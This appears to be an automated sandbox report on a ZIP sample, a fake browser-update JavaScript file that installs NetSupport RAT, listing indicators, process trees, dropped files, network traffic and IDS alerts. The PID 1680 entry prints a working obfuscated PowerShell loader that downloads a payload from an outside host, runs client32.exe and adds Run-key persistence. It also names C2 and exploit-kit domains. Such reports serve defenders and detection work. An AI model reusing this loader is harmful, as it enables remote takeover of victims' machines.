| File name: | MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip |
| Full analysis: | https://app.any.run/tasks/74ef4cfb-f5c0-4af3-bae3-615c7104e98e |
| Verdict: | Malicious activity |
| Threats: | NetSupport RAT is a malicious adaptation of the legitimate NetSupport Manager, a remote access tool used for IT support, which cybercriminals exploit to gain unauthorized control over systems. It has gained significant traction due to its sophisticated evasion techniques, widespread distribution campaigns, and the challenge it poses to security professionals who must distinguish between legitimate and malicious uses of the underlying software. |
| Analysis date: | May 14, 2024, 21:53:16 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/zip |
| File info: | Zip archive data, at least v2.0 to extract, compression method=deflate |
| MD5: | 781BCA08C51BA9B4D1B9AAFD23A79465 |
| SHA1: | 6F898F945CB9BA27FEF50AC4C47FBE2079CE2A76 |
| SHA256: | 07ED8EBCAFC757D5C6122840F42678C0F00B8C0C769A7BD4A9DBAD6859EE7A48 |
| SSDEEP: | 49152:QwnjVvep/MJEcusnkROZ2CITqdCqPYGI3D4wGF35BgesARIzM0FTqdwhB2JLB9z9:9jJepE3kIZhdCEDs0wU35iesAEXkwhgn |
MALICIOUS
Unusual connection from system programs
- wscript.exe (PID: 4032)
Creates internet connection object (SCRIPT)
- wscript.exe (PID: 4032)
Changes powershell execution policy (Bypass)
- wscript.exe (PID: 4032)
Sends HTTP request (SCRIPT)
- wscript.exe (PID: 4032)
Bypass execution policy to execute commands
- powershell.exe (PID: 1680)
Opens an HTTP connection (SCRIPT)
- wscript.exe (PID: 4032)
Drops the executable file immediately after the start
- powershell.exe (PID: 1680)
Connects to the CnC server
- client32.exe (PID: 1660)
NETSUPPORT has been detected (SURICATA)
- client32.exe (PID: 1660)
SUSPICIOUS
The process executes JS scripts
- WinRAR.exe (PID: 3988)
Reads security settings of Internet Explorer
- WinRAR.exe (PID: 3988)
- client32.exe (PID: 1660)
Reads the Internet Settings
- wscript.exe (PID: 4032)
- powershell.exe (PID: 1680)
- client32.exe (PID: 1660)
Probably obfuscated PowerShell command line is found
- wscript.exe (PID: 4032)
Powershell scripting: start process
- wscript.exe (PID: 4032)
Runs shell command (SCRIPT)
- wscript.exe (PID: 4032)
Contacting a server suspected of hosting an Exploit Kit
- wscript.exe (PID: 4032)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 4032)
Probably download files using WebClient
- wscript.exe (PID: 4032)
Adds/modifies Windows certificates
- wscript.exe (PID: 4032)
The process bypasses the loading of PowerShell profile settings
- wscript.exe (PID: 4032)
Unusual connection from system programs
- powershell.exe (PID: 1680)
Gets path to any of the special folders (POWERSHELL)
- powershell.exe (PID: 1680)
Executable content was dropped or overwritten
- powershell.exe (PID: 1680)
The Powershell connects to the Internet
- powershell.exe (PID: 1680)
Process drops legitimate windows executable
- powershell.exe (PID: 1680)
Uses base64 encoding (POWERSHELL)
- powershell.exe (PID: 1680)
The process drops C-runtime libraries
- powershell.exe (PID: 1680)
Writes data into a file (POWERSHELL)
- powershell.exe (PID: 1680)
Extracts files to a directory (POWERSHELL)
- powershell.exe (PID: 1680)
Potential Corporate Privacy Violation
- client32.exe (PID: 1660)
Contacting a server suspected of hosting an CnC
- client32.exe (PID: 1660)
INFO
Checks proxy server information
- wscript.exe (PID: 4032)
- client32.exe (PID: 1660)
Checks supported languages
- wmpnscfg.exe (PID: 116)
- client32.exe (PID: 1660)
Reads the computer name
- wmpnscfg.exe (PID: 116)
- client32.exe (PID: 1660)
Manual execution by a user
- wmpnscfg.exe (PID: 116)
- msedge.exe (PID: 568)
Drop NetSupport executable file
- powershell.exe (PID: 1680)
Uses string replace method (POWERSHELL)
- powershell.exe (PID: 1680)
Gets or sets the time when the file was last written to (POWERSHELL)
- powershell.exe (PID: 1680)
The executable file from the user directory is run by the Powershell process
- client32.exe (PID: 1660)
Reads the machine GUID from the registry
- client32.exe (PID: 1660)
Creates files or folders in the user directory
- client32.exe (PID: 1660)
Application launched itself
- msedge.exe (PID: 568)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .zip | | | ZIP compressed archive (100) |
|---|
EXIF
ZIP
| ZipRequiredVersion: | 20 |
|---|---|
| ZipBitFlag: | 0x0001 |
| ZipCompression: | Deflated |
| ZipModifyDate: | 2024:05:14 21:50:02 |
| ZipCRC: | 0x5ea2ad05 |
| ZipCompressedSize: | 1526049 |
| ZipUncompressedSize: | 6725136 |
| ZipFileName: | Update_123.0.6312.111.js |
Total processes
50
Monitored processes
15
Malicious processes
4
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 116 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 568 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default | C:\Program Files\Microsoft\Edge\Application\msedge.exe | explorer.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1128 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --instant-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2224 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1660 | "C:\Users\admin\AppData\Roaming\DIVX23\client32.exe" | C:\Users\admin\AppData\Roaming\DIVX23\client32.exe | powershell.exe | ||||||||||||
User: admin Company: NetSupport Ltd Integrity Level: MEDIUM Description: NetSupport Client Application Version: V12.00 Modules
| |||||||||||||||
| 1680 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $FCcDDxLrGq='https://redsquardhack.com/data.php?6310';$eoXTENOQCydrNVviEnIhWChNQTvOXUHz=(New-Object System.Net.WebClient).DownloadString($FCcDDxLrGq);$lhxQchJQyWKZfIIxaEHHYySzPDsstRqKrt=[System.Convert]::FromBase64String($eoXTENOQCydrNVviEnIhWChNQTvOXUHz);$zxc = Get-Random -Minimum -10 -Maximum 37; $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY=[System.Environment]::GetFolderPath('ApplicationData')+'\DIVX'+$zxc;if (!(Test-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -PathType Container)) { New-Item -Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -ItemType Directory };$p=Join-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY 'ah.zip';[System.IO.File]::WriteAllBytes($p,$lhxQchJQyWKZfIIxaEHHYySzPDsstRqKrt);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$AZ=Get-Item $gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY -Force; $AZ.attributes='Hidden';$s=$gsCXOxjoheIpsTHxLIbClAuUbvszvkVGJFY+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='OFFICEC';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 1832 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3924 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Exit code: 0 Version: 109.0.1518.115 Modules
| |||||||||||||||
| 1928 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=109.0.5414.149 "--annotation=exe=C:\Program Files\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win32 "--annotation=prod=Microsoft Edge" --annotation=ver=109.0.1518.115 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd8,0x6db6f598,0x6db6f5a8,0x6db6f5b4 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2324 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=renderer --first-renderer-process --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2216 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:1 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2416 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1428 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:2 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
| 2456 | "C:\Program Files\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1632 --field-trial-handle=1344,i,1018471755629293633,15402133399042776092,131072 /prefetch:8 | C:\Program Files\Microsoft\Edge\Application\msedge.exe | — | msedge.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Edge Version: 109.0.1518.115 Modules
| |||||||||||||||
Total events
21 183
Read events
20 993
Write events
153
Delete events
37
Modification events
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\182\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 3 |
Value: C:\Users\admin\Desktop\phacker.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 2 |
Value: C:\Users\admin\Desktop\Win7-KB3191566-x86.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 1 |
Value: C:\Users\admin\Desktop\curl-8.5.0_1-win32-mingw.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\MDE_File_Sample_d10ad13321fd608d96979e9ef3b028eb8004d8e3.zip | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (3988) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
Executable files
47
Suspicious files
340
Text files
66
Unknown types
1
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 3988 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb3988.42261\Update_123.0.6312.111.js | — | |
MD5:— | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\B6QGX7LP\update[1].js | — | |
MD5:— | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\645591AAA95382DE83054171366571D4 | der | |
MD5:A0C9DBCF06672BFCED36253E072E1ECC | SHA256:CFA1584DB34A9FD3665B9C94241B7ECD80AE7A55CEF1AA7504656C45B4E22182 | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | binary | |
MD5:C8A6F4C55C95DAE241FB25E4104EC3CD | SHA256:6F47F72CEB7211A57DE489298CF002C5399436F7874A0BABCFB8C9A71EB224AE | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | der | |
MD5:822467B728B7A66B081C91795373789A | SHA256:AF2343382B88335EEA72251AD84949E244FF54B6995063E24459A7216E9576B9 | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | binary | |
MD5:B962EAC5D5CAF6955F3E2932D6AED8E0 | SHA256:A45100C11485DD5D82832D627AE3E7B5B8D18469A9615833DC7EEA1D99170C5F | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Local\Temp\55ifxtvp.2qf.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:— | |||
| 4032 | wscript.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\645591AAA95382DE83054171366571D4 | binary | |
MD5:2623B8CEA0C2F1772E533F19F76E332C | SHA256:FE8B80146456EB583CAA25A9486F57C872B5C53C3CDF4A3DD37CC46D8BA85363 | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Roaming\DIVX23\SimpleFilter.dll | executable | |
MD5:90CDC635A1F1F8E6E1EE68918E0FB71A | SHA256:AFEE7DF6255757B3251721FCA42E844753A617E0AA1ED43734E32E2FDAE2C0AF | |||
| 1680 | powershell.exe | C:\Users\admin\AppData\Roaming\DIVX23\Timeline.dll | executable | |
MD5:EC476C3EE3F7D463FC8B71A8DA42E103 | SHA256:25E20D696FA2D40CAB80D6E45E998F63EF17564B4BACD978D98DBF4492BE93EE | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
9
TCP/UDP connections
43
DNS requests
72
Threats
14
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?d22e69cee3fc1e30 | unknown | — | — | unknown |
— | — | GET | 200 | 2.19.217.103:80 | http://x1.c.lencr.org/ | unknown | — | — | unknown |
4032 | wscript.exe | GET | 200 | 95.100.146.66:80 | http://r3.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgMlsNRuEWX7Mma%2BFnjNb168Hw%3D%3D | unknown | — | — | unknown |
1660 | client32.exe | GET | 200 | 104.26.1.231:80 | http://geo.netsupportsoftware.com/location/loca.asp | unknown | — | — | unknown |
1660 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1660 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1660 | client32.exe | POST | 200 | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1660 | client32.exe | POST | — | 5.181.156.36:443 | http://5.181.156.36/fakeurl.htm | unknown | — | — | unknown |
1088 | svchost.exe | GET | 304 | 199.232.214.172:80 | http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/disallowedcertstl.cab?cf3b3ae38045042c | unknown | — | — | unknown |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
— | — | 224.0.0.252:5355 | — | — | — | unknown |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1088 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
4032 | wscript.exe | 45.89.53.17:443 | firstaischool.com | — | UA | unknown |
4032 | wscript.exe | 199.232.214.172:80 | ctldl.windowsupdate.com | FASTLY | US | unknown |
4032 | wscript.exe | 2.19.217.103:80 | x1.c.lencr.org | Akamai International B.V. | NL | unknown |
4032 | wscript.exe | 95.100.146.66:80 | r3.o.lencr.org | Akamai International B.V. | CZ | unknown |
1680 | powershell.exe | 45.89.53.18:443 | redsquardhack.com | — | UA | unknown |
1660 | client32.exe | 104.26.1.231:80 | geo.netsupportsoftware.com | CLOUDFLARENET | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
firstaischool.com |
| unknown |
ctldl.windowsupdate.com |
| whitelisted |
x1.c.lencr.org |
| whitelisted |
r3.o.lencr.org |
| shared |
redsquardhack.com |
| unknown |
geo.netsupportsoftware.com |
| unknown |
ntp.msn.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
edge.microsoft.com |
| whitelisted |
assets.msn.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
1088 | svchost.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in DNS Lookup (firstaischool .com) |
4032 | wscript.exe | Exploit Kit Activity Detected | ET EXPLOIT_KIT ZPHP Domain in TLS SNI (firstaischool .com) |
1660 | client32.exe | Potential Corporate Privacy Violation | ET POLICY NetSupport GeoLocation Lookup Request |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Checkin |
1660 | client32.exe | Misc activity | ET INFO NetSupport Remote Admin Response |
1660 | client32.exe | Potentially Bad Traffic | ET POLICY HTTP traffic on port 443 (POST) |
3 ETPRO signatures available at the full report